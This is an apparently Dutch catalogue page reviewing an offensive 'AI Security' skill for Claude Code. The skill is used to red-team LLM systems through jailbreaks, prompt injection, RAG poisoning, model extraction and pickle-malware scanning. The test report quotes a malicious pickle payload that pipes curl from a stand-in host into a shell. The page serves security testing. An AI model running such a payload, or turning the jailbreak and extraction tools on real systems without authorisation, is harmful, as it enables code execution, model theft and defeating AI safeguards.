AI Security

Offensieve testen van LLM/ML-systemen: prompt injection, RAG poisoning, pickle-model scanning

Door hypnguyen1209 · hypnguyen1209/offensive-claude

Getest · Werkt ★ 9.2/10

AI Security — Offensieve testen van LLM/ML-systemen: prompt injection, RAG poisoning, pickle-model scanning

Wat het doet

Een offensieve beveiligingsskill voor red-teaming van AI/ML-systemen: prompt-injection en multi-turn jailbreak batterijen, RAG/vector-DB poisoning, MCP/agent tool-poisoning audits, pre-load pickle-model malware scanning, en black-box model extraction/membership-inference probes, met OWASP LLM Top-10 en MITRE ATLAS mappings. Triggert wanneer een gebruiker vraagt om een LLM, chatbot, RAG pipeline, MCP server, of een gedownload model artifact aan te vallen, te red-teamen of te auditen. Levert vijf uitvoerbare Python scripts plus vijf referentie deep-dives gekoppeld aan specifieke 2024-2025 CVE's.

Testrapport

skills/ai-security/SKILL.md opgehaald en 3 gebundelde bestanden (promptinject_harness.py, rag_poisoner.py, prompt-injection-jailbreak.md) steekproefsgewijs gecontroleerd — allemaal HTTP 200. Voor OUTPUT heb ik de stdlib-only scripts/model_scan.py van de skill uitgevoerd tegen pickles die ik had gemaakt: een kwaadaardige met __reduce__ -> os.system("curl http://evil.tld/x | sh"), een goedaardige, en een goedaardige waarvan de data alleen de strings "operating_system"/"subprocess" bevatte. Baseline (naïeve byte-grep) markeerde het kwaadaardige bestand, maar gaf ook een FALSE-POSITIEF voor het goedaardige label-lijstbestand. De skill demonteerde pickle opcodes via pickletools, loste posix.system op via REDUCE-reachability als een deny-listed callable (gestructureerde JSONL: severity high, CWE-502, AML.T0011, exit code 2 als een CI gate), en keurde beide goedaardige bestanden correct goed. Installatie geverifieerd in een schone mktemp HOME, waarbij SKILL.md op ~/.claude/skills/ai-security/SKILL.md werd geplaatst.

Getest op: 2026-07-31 · Claude Code 2.x (agent harness)

Installatie

git clone --depth 1 https://github.com/hypnguyen1209/offensive-claude.git /tmp/ai-security-src
mkdir -p ~/.claude/skills
cp -R /tmp/ai-security-src/skills/ai-security ~/.claude/skills/ai-security
# Verifies at ~/.claude/skills/ai-security/SKILL.md (bundles references/ + scripts/).
# Script deps vary: model_scan.py is stdlib-only; rag_poisoner.py needs sentence-transformers;
#   promptinject_harness.py + model_extractor.py need `pip install requests` and a live target endpoint.
# Repo-level plugin alternative (registers a SessionStart dispatcher hook — not needed for this skill alone):
#   /plugin marketplace add hypnguyen1209/offensive-claude
#   /plugin install offensive-claude@offensive-claude-marketplace
# NOTE: the README also offers `curl -sL .../install.sh | bash` — a curl|sh pipe; the manual cp above avoids it.

Commando's en voorbeeldprompts

  • /ai-securityOffensieve testen van LLM/ML-systemen: prompt injection, RAG poisoning, pickle-model scanning

Skills reageren op gewone verzoeken — geen commando's om te onthouden. Na installatie activeren prompts zoals deze de skill (in het Engels):

  • Test this model against known jailbreak techniques
  • Check this RAG pipeline for vector poisoning
  • Run a model extraction attack against this API